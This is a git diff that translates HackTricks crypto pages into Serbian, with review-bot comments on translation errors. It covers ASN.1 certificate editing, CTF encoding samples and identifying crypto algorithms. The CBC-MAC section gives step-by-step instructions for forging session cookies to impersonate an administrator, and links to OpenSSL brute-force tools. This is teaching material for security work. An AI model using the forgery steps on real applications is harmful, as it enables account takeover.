(DER/PEM) editing** (works with certificates or almost any other ASN.1 structure): - 1. 
Clone [asn1template](https://github.com/wllm-rbnt/asn1template/) - +- **ASN.1 (DER/PEM) uređivanje** (radi sa sertifikatima ili gotovo bilo kojom drugom ASN.1 strukturom): +1. Klonirajte [asn1template](https://github.com/wllm-rbnt/asn1template/) ```bash git clone https://github.com/wllm-rbnt/asn1template.git ``` - -2. Convert DER/PEM to OpenSSL's generation format - +2. Konvertujte DER/PEM u OpenSSL-ov format generacije ```bash asn1template/asn1template.pl certificatename.der > certificatename.tpl asn1template/asn1template.pl -p certificatename.pem > certificatename.tpl ``` - -3. Edit certificatename.tpl according to your requirements - +3. Izmenite certificatename.tpl prema vašim zahtevima ```bash vim certificatename.tpl ``` - -4. Rebuild the modified certificate - +4. Ponovo izgradite modifikovani sertifikat ```bash openssl asn1parse -genconf certificatename.tpl -out certificatename_new.der openssl asn1parse -genconf certificatename.tpl -outform PEM -out certificatename_new.pem ``` - ---- - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %} +--- {{#include ../banners/hacktricks-training.md}} diff --git a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 47f1b2713..88b994a98 100644 --- a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md 
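Review bot: in the certificates.md conversion hunk above, the labels are translated inconsistently: `PEM u DER`, `DER u PEM`, `PEM u P7B`, `PKCS7 u PEM` and `PFX u PEM` are Serbian, but `x509 to PEM`, `PFX to PKCS#8` and `P7B to PFX` stay in English next to translated step text ("uključuje dva koraka", "takođe zahteva dve komande"). Translate the remaining three to the same "X u Y" form. Pre-existing nit worth fixing while touching these lines: the unchanged context line `openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8` uses `openSSL`, which fails on case-sensitive systems; every other command in the section uses `openssl`.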
@@ -2,54 +2,54 @@ # CBC -If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie. +Ako je **kolačić** **samo** **korisničko ime** (ili je prvi deo kolačića korisničko ime) i želite da se lažno predstavljate kao korisničko ime "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce**-ovati **prvi bajt** kolačića. # CBC-MAC -**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. +**Cipher block chaining message authentication code** (**CBC-MAC**) je metoda koja se koristi u kriptografiji. Funkcioniše tako što uzima poruku i šifruje je blok po blok, pri čemu je šifrovanje svakog bloka povezano sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da će promena čak i jednog bita originalne poruke dovesti do nepredvidive promene u poslednjem bloku šifrovanih podataka. Da bi se izvršila ili obrnula takva promena, potrebna je šifrovana ključeva, čime se osigurava bezbednost. -To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. 
The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: +Da bi se izračunao CBC-MAC poruke m, šifruje se m u CBC režimu sa nultim inicijalizacionim vektorom i čuva se poslednji blok. Sledeća slika prikazuje izračunavanje CBC-MAC-a poruke koja se sastoji od blokova![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifru E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png]() -# Vulnerability +# Ranljivost -With CBC-MAC usually the **IV used is 0**.\ -This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So: +Sa CBC-MAC obično je **IV koji se koristi 0**.\ +To je problem jer 2 poznate poruke (`m1` i `m2`) nezavisno generišu 2 potpisa (`s1` i `s2`). 
Tako: - `E(m1 XOR 0) = s1` - `E(m2 XOR 0) = s2` -Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32): +Tada poruka sastavljena od m1 i m2 konkateniranih (m3) generisaće 2 potpisa (s31 i s32): - `E(m1 XOR 0) = s31 = s1` - `E(m2 XOR s1) = s32` -**Which is possible to calculate without knowing the key of the encryption.** +**Što je moguće izračunati bez poznavanja ključa šifrovanja.** -Imagine you are encrypting the name **Administrator** in **8bytes** blocks: +Zamislite da šifrujete ime **Administrator** u **8 bajtnih** blokova: - `Administ` - `rator\00\00\00` -You can create a username called **Administ** (m1) and retrieve the signature (s1).\ -Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\ -now, you can use s32 as the signature of the full name **Administrator**. +Možete kreirati korisničko ime pod nazivom **Administ** (m1) i dobiti potpis (s1).\ +Zatim, možete kreirati korisničko ime koje je rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` što je s32.\ +sada, možete koristiti s32 kao potpis punog imena **Administrator**. -### Summary +### Sažetak -1. Get the signature of username **Administ** (m1) which is s1 -2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.** -3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**. +1. Dobijte potpis korisničkog imena **Administ** (m1) koji je s1 +2. Dobijte potpis korisničkog imena **rator\x00\x00\x00 XOR s1 XOR 0** je s32**.** +3. Postavite kolačić na s32 i biće to validan kolačić za korisnika **Administrator**. 
-# Attack Controlling IV +# Napad Kontrolisanjem IV -If you can control the used IV the attack could be very easy.\ -If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ -Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**. +Ako možete kontrolisati korišćeni IV, napad bi mogao biti vrlo lak.\ +Ako je kolačić samo šifrovano korisničko ime, da biste se lažno predstavljali kao korisnik "**administrator**", možete kreirati korisnika "**Administrator**" i dobićete njegov kolačić.\ +Sada, ako možete kontrolisati IV, možete promeniti prvi bajt IV-a tako da **IV\[0] XOR "A" == IV'\[0] XOR "a"** i regenerisati kolačić za korisnika **Administrator.** Ovaj kolačić će biti validan za **lažno predstavljanje** korisnika **administrator** sa inicijalnim **IV**. -## References +## Reference -More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +Više informacija na [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) {{#include ../banners/hacktricks-training.md}} diff --git a/src/crypto-and-stego/crypto-ctfs-tricks.md b/src/crypto-and-stego/crypto-ctfs-tricks.md index bb2b5f049..3115edaeb 100644 --- a/src/crypto-and-stego/crypto-ctfs-tricks.md +++ b/src/crypto-and-stego/crypto-ctfs-tricks.md @@ -25,7 +25,7 @@ ## Encoders -Most of encoded data can be decoded with these 2 ressources: +Većina kodiranih podataka može se dekodirati pomoću ovih 2 resursa: - [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) - [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) 
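Review bot: in the CBC-MAC hunk, "potrebna je šifrovana ključeva" mistranslates "the encryption key is required" and is ungrammatical; it should read "potreban je ključ za šifrovanje". The heading "Ranljivost" is a typo for "Ranjivost", and "u 8 bajtnih blokova" should be "u blokovima od 8 bajtova" so the block size reads as the unit the example depends on (`Administ` and `rator\00\00\00` are exactly 8 bytes each). In the first crypto-ctfs-tricks.md hunk, "ovih 2 resursa" should be "ova 2 resursa".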
@@ -33,7 +33,7 @@ Most of encoded data can be decoded with these 2 ressources: ### Substitution Autosolvers - [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -- [https://quipqiup.com/](https://quipqiup.com) - Very good ! +- [https://quipqiup.com/](https://quipqiup.com) - Veoma dobro! #### Caesar - ROTx Autosolvers 
@@ -45,95 +45,90 @@ Most of encoded data can be decoded with these 2 ressources: ### Base Encodings Autosolver -Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +Proverite sve ove baze sa: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) - **Ascii85** - - `BQ%]q@psCd@rH0l` +- `BQ%]q@psCd@rH0l` - **Base26** \[_A-Z_] - - `BQEKGAHRJKHQMVZGKUXNT` +- `BQEKGAHRJKHQMVZGKUXNT` - **Base32** \[_A-Z2-7=_] - - `NBXWYYLDMFZGCY3PNRQQ====` +- `NBXWYYLDMFZGCY3PNRQQ====` - **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] - - `pbzsaamdcf3gna5xptoo====` +- `pbzsaamdcf3gna5xptoo====` - **Base32 Geohash** \[_0-9b-hjkmnp-z_] - - `e1rqssc3d5t62svgejhh====` +- `e1rqssc3d5t62svgejhh====` - **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] - - `D1QPRRB3C5S62RVFDHGG====` +- `D1QPRRB3C5S62RVFDHGG====` - **Base32 Extended Hexadecimal** \[_0-9A-V_] - - `D1NMOOB3C5P62ORFDHGG====` +- `D1NMOOB3C5P62ORFDHGG====` - **Base45** \[_0-9A-Z $%\*+-./:_] - - `59DPVDGPCVKEUPCPVD` +- `59DPVDGPCVKEUPCPVD` - **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] - - `2yJiRg5BF9gmsU6AC` +- `2yJiRg5BF9gmsU6AC` - **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] - - `2YiHqF5bf9FLSt6ac` +- `2YiHqF5bf9FLSt6ac` - **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] - - `pyJ5RgnBE9gm17awU` +- `pyJ5RgnBE9gm17awU` - **Base62** \[_0-9A-Za-z_] - - `g2AextRZpBKRBzQ9` +- `g2AextRZpBKRBzQ9` - **Base64** \[_A-Za-z0-9+/=_] - - `aG9sYWNhcmFjb2xh` +- `aG9sYWNhcmFjb2xh` - **Base67** \[_A-Za-z0-9-_.!\~\_] - - `NI9JKX0cSUdqhr!p` +- `NI9JKX0cSUdqhr!p` - **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - - `BQ%]q@psCd@rH0l` +- `BQ%]q@psCd@rH0l` - **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - - `<~BQ%]q@psCd@rH0l~>` +- `<~BQ%]q@psCd@rH0l~>` - **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] - - `Xm4y`V\_|Y(V{dF>\` +- `Xm4y`V\_|Y(V{dF>\` - **Base85 (xbtoa)** 
\[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - - `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` +- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` - **Base85 (XML)** \[\_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\_\_] - - `Xm4y|V{~Y+V}dF?` +- `Xm4y|V{~Y+V}dF?` - **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] - - `frDg[*jNN!7&BQM` +- `frDg[*jNN!7&BQM` - **Base100** \[] - - `👟👦👣👘👚👘👩👘👚👦👣👘` +- `👟👦👣👘👚👘👩👘👚👦👣👘` - **Base122** \[] - - `4F ˂r0Xmvc` +- `4F ˂r0Xmvc` - **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] - - `MIc3KiXa+Ihz+lrXMIc3KbCC` +- `MIc3KiXa+Ihz+lrXMIc3KbCC` - **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] - - `DmPsv8J7qrlKEoY7` +- `DmPsv8J7qrlKEoY7` - **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] - - `kLD8iwKsigSalLJ5` +- `kLD8iwKsigSalLJ5` - **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] - - `ayRiIo1gpO+uUc7g` +- `ayRiIo1gpO+uUc7g` - **ESAB46** \[] - - `3sHcL2NR8WrT7mhR` +- `3sHcL2NR8WrT7mhR` - **MEGAN45** \[] - - `kLD8igSXm2KZlwrX` +- `kLD8igSXm2KZlwrX` - **TIGO3FX** \[] - - `7AP9mIzdmltYmIP9mWXX` +- `7AP9mIzdmltYmIP9mWXX` - **TRIPO5** \[] - - `UE9vSbnBW6psVzxB` +- `UE9vSbnBW6psVzxB` - **FERON74** \[] - - `PbGkNudxCzaKBm0x` +- `PbGkNudxCzaKBm0x` - **GILA7** \[] - - `D+nkv8C1qIKMErY1` +- `D+nkv8C1qIKMErY1` - **Citrix CTX1** \[] - - `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` +- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` [http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) ### HackerizeXS \[_╫Λ↻├☰┏_] - ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` - -- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 
Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) +- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Mrtvo: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) ### Morse - ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` - -- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Mrtav: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### UUencoder - ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( 
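Review bot: the `@@ -45,95 +45,90 @@` hunk flattens the base-encodings list: every indented sub-item (`  - \`BQ%]q@psCd@rH0l\``, `  - \`NBXWYYLDMFZGCY3PNRQQ====\``, and so on) is replaced by a top-level `- \`...\`` item, so each example string becomes a sibling of the encoding name it belongs to instead of its child, and the rendered list no longer shows which sample goes with which encoding. Keep the two-space indent on the example lines; this should be a text-only translation change. Also, "404 Dead" is rendered as "404 Mrtvo" in one place and "404 Mrtav" in the next; pick one.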
@@ -142,98 +137,79 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$` ` end ``` - -- [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) - ### XXEncoder - ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 5Hol-G2xAEE++ end ``` - - [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) ### YEncoder - ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk =yend size=28 crc32=35834c86 ``` - - [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) ### BinHex - ``` (This file must be converted with BinHex 4.0) :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p -38K26%'d9J!!: ``` - - [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) ### ASCII85 - ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` - - [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85) -### Dvorak keyboard - +### Dvorak tastatura ``` drnajapajrna ``` - - [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard) ### A1Z26 -Letters to their numerical value - +Slova do njihove numeričke vrednosti ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` - ### Affine Cipher Encode -Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter - +Pismo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je pismo) i rezultat nazad u pismo ``` krodfdudfrod ``` +### SMS Kod -### SMS Code +**Multitap** [menja slovo](https://www.dcode.fr/word-letter-change) ponovljenim ciframa definisanim odgovarajućim kodom tastera na mobilnom [tastaturi telefona](https://www.dcode.fr/phone-keypad-cipher) (Ovaj način se koristi prilikom pisanja SMS-a).\ +Na primer: 2=A, 22=B, 222=C, 3=D...\ +Možete 
identifikovati ovaj kod jer ćete videti\*\* nekoliko ponovljenih brojeva\*\*. -**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\ -For example: 2=A, 22=B, 222=C, 3=D...\ -You can identify this code because you will see\*\* several numbers repeated\*\*. +Možete dekodirati ovaj kod na: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) -You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) - -### Bacon Code - -Substitude each letter for 4 As or Bs (or 1s and 0s) +### Bacon Kod +Zamenite svako slovo sa 4 A ili B (ili 1 i 0) ``` 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000 AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ``` - ### Runes ![](../images/runes.jpg) -## Compression +## Kompresija -**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers. +**Raw Deflate** i **Raw Inflate** (možete ih pronaći u Cyberchef-u) mogu kompresovati i dekompresovati podatke bez zaglavlja. -## Easy Crypto +## Laka Kriptografija ### XOR - Autosolver 
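Review bot: in the Affine Cipher paragraph, "Pismo u broj ... _x_ je pismo" uses "pismo" (a mailed letter), not "slovo" (a letter of the alphabet); the sentence should read "Slovo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je slovo) i rezultat nazad u slovo". Under A1Z26, "Slova do njihove numeričke vrednosti" should be "Slova u njihove numeričke vrednosti". In the SMS paragraph the escaped asterisks in "videti\*\* nekoliko ponovljenih brojeva\*\*" are carried over from the source and render literally rather than as bold; while translating, move the markers to `**nekoliko ponovljenih brojeva**`.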
@@ -241,30 +217,25 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ### Bifid -A keywork is needed - +Potrebna je ključna reč ``` fgaargaamnlunesuneoa ``` - ### Vigenere -A keywork is needed - +Potreban je ključ. ``` wodsyoidrods ``` - - [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) - [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) - [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) -## Strong Crypto +## Snažna Kriptografija ### Fernet -2 base64 strings (token and key) - +2 base64 stringa (token i ključ) ``` Token: gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== @@ -272,19 +243,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC Key: -s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= ``` - - [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) ### Samir Secret Sharing -A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - +Tajna se deli na X delova i da biste je povratili, potrebna su vam Y dela (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 803bc8cf294b3f83d88e86d9818792e80cd ``` - [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) ### OpenSSL brute-force @@ -292,7 +260,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) - [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF) -## Tools +## Alati - [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) 
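Review bot: the same source sentence ("A keywork is needed", a typo for keyword) is translated two ways in the `@@ -241,30 +217,25 @@` hunk: "Potrebna je ključna reč" under Bifid and "Potreban je ključ." under Vigenere, the latter dropping "word" and gaining a trailing period the other lacks; use "Potrebna je ključna reč" for both. In the secret-sharing hunk, "potrebna su vam Y dela" should be "potrebno vam je Y delova", and the unchanged heading `### Samir Secret Sharing` is a pre-existing misspelling of Shamir that could be fixed in the same pass.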
diff --git a/src/crypto-and-stego/cryptographic-algorithms/README.md b/src/crypto-and-stego/cryptographic-algorithms/README.md index bcfcf1d0a..f53e97661 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/README.md +++ b/src/crypto-and-stego/cryptographic-algorithms/README.md 
@@ -1,184 +1,184 @@ -# Cryptographic/Compression Algorithms +# Kriptografski/Kompresioni Algoritmi -## Cryptographic/Compression Algorithms +## Kriptografski/Kompresioni Algoritmi {{#include ../../banners/hacktricks-training.md}} -## Identifying Algorithms +## Identifikacija Algoritama -If you ends in a code **using shift rights and lefts, xors and several arithmetic operations** it's highly possible that it's the implementation of a **cryptographic algorithm**. Here it's going to be showed some ways to **identify the algorithm that it's used without needing to reverse each step**. +Ako završite u kodu **koristeći pomeranja udesno i ulevo, XOR-ove i nekoliko aritmetičkih operacija**, veoma je verovatno da je to implementacija **kriptografskog algoritma**. Ovde će biti prikazani neki načini da se **identifikuje algoritam koji se koristi bez potrebe da se obrne svaki korak**. -### API functions +### API funkcije **CryptDeriveKey** -If this function is used, you can find which **algorithm is being used** checking the value of the second parameter: +Ako se ova funkcija koristi, možete saznati koji se **algoritam koristi** proverom vrednosti drugog parametra: ![](<../../images/image (156).png>) -Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id) +Proverite ovde tabelu mogućih algoritama i njihovih dodeljenih vrednosti: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id) **RtlCompressBuffer/RtlDecompressBuffer** -Compresses and decompresses a given buffer of data. +Kompresuje i dekompresuje dati bafer podataka. 
**CryptAcquireContext** -From [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. +Iz [dokumentacije](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): Funkcija **CryptAcquireContext** se koristi za sticanje rukohvata za određeni kontejner ključeva unutar određenog kriptografskog servisnog provajdera (CSP). **Ovaj vraćeni rukohvat se koristi u pozivima funkcija CryptoAPI** koje koriste odabrani CSP. **CryptCreateHash** -Initiates the hashing of a stream of data. If this function is used, you can find which **algorithm is being used** checking the value of the second parameter: +Inicira heširanje toka podataka. Ako se ova funkcija koristi, možete saznati koji se **algoritam koristi** proverom vrednosti drugog parametra: ![](<../../images/image (549).png>) \ -Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id) +Proverite ovde tabelu mogućih algoritama i njihovih dodeljenih vrednosti: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id) -### Code constants +### Konstantne u kodu -Sometimes it's really easy to identify an algorithm thanks to the fact that it needs to use a special and unique value. +Ponekad je zaista lako identifikovati algoritam zahvaljujući činjenici da mora koristiti posebnu i jedinstvenu vrednost. 
![](<../../images/image (833).png>) -If you search for the first constant in Google this is what you get: +Ako pretražujete prvu konstantu na Google-u, ovo je ono što dobijate: ![](<../../images/image (529).png>) -Therefore, you can assume that the decompiled function is a **sha256 calculator.**\ -You can search any of the other constants and you will obtain (probably) the same result. +Stoga, možete pretpostaviti da je dekompilovana funkcija **sha256 kalkulator.**\ +Možete pretražiti bilo koju od drugih konstanti i dobićete (verovatno) isti rezultat. -### data info +### informacija o podacima -If the code doesn't have any significant constant it may be **loading information from the .data section**.\ -You can access that data, **group the first dword** and search for it in google as we have done in the section before: +Ako kod nema nijednu značajnu konstantu, može biti da **učitava informacije iz .data sekcije**.\ +Možete pristupiti tim podacima, **grupisati prvi dword** i pretražiti ga na Google-u kao što smo uradili u prethodnoj sekciji: ![](<../../images/image (531).png>) -In this case, if you look for **0xA56363C6** you can find that it's related to the **tables of the AES algorithm**. +U ovom slučaju, ako tražite **0xA56363C6**, možete pronaći da je povezan sa **tabelama AES algoritma**. -## RC4 **(Symmetric Crypt)** +## RC4 **(Simetrična Kriptografija)** -### Characteristics +### Karakteristike -It's composed of 3 main parts: +Sastoji se od 3 glavne komponente: -- **Initialization stage/**: Creates a **table of values from 0x00 to 0xFF** (256bytes in total, 0x100). This table is commonly call **Substitution Box** (or SBox). -- **Scrambling stage**: Will **loop through the table** crated before (loop of 0x100 iterations, again) creating modifying each value with **semi-random** bytes. In order to create this semi-random bytes, the RC4 **key is used**. 
RC4 **keys** can be **between 1 and 256 bytes in length**, however it is usually recommended that it is above 5 bytes. Commonly, RC4 keys are 16 bytes in length. -- **XOR stage**: Finally, the plain-text or cyphertext is **XORed with the values created before**. The function to encrypt and decrypt is the same. For this, a **loop through the created 256 bytes** will be performed as many times as necessary. This is usually recognized in a decompiled code with a **%256 (mod 256)**. +- **Faza inicijalizacije/**: Kreira **tabelu vrednosti od 0x00 do 0xFF** (ukupno 256 bajtova, 0x100). Ova tabela se obično naziva **Substituciona Kutija** (ili SBox). +- **Faza premeštanja**: **Prolazi kroz tabelu** kreiranu ranije (petlja od 0x100 iteracija, ponovo) modifikujući svaku vrednost sa **polu-nasumičnim** bajtovima. Da bi se kreirali ovi polu-nasumični bajtovi, koristi se RC4 **ključ**. RC4 **ključevi** mogu biti **između 1 i 256 bajtova dužine**, međutim obično se preporučuje da budu iznad 5 bajtova. Obično, RC4 ključevi su 16 bajtova dužine. +- **XOR faza**: Na kraju, običan tekst ili šifrovani tekst se **XOR-uje sa vrednostima kreiranim ranije**. Funkcija za enkripciju i dekripciju je ista. Za ovo, **proći će se kroz kreiranih 256 bajtova** onoliko puta koliko je potrebno. Ovo se obično prepoznaje u dekompilovanom kodu sa **%256 (mod 256)**. 
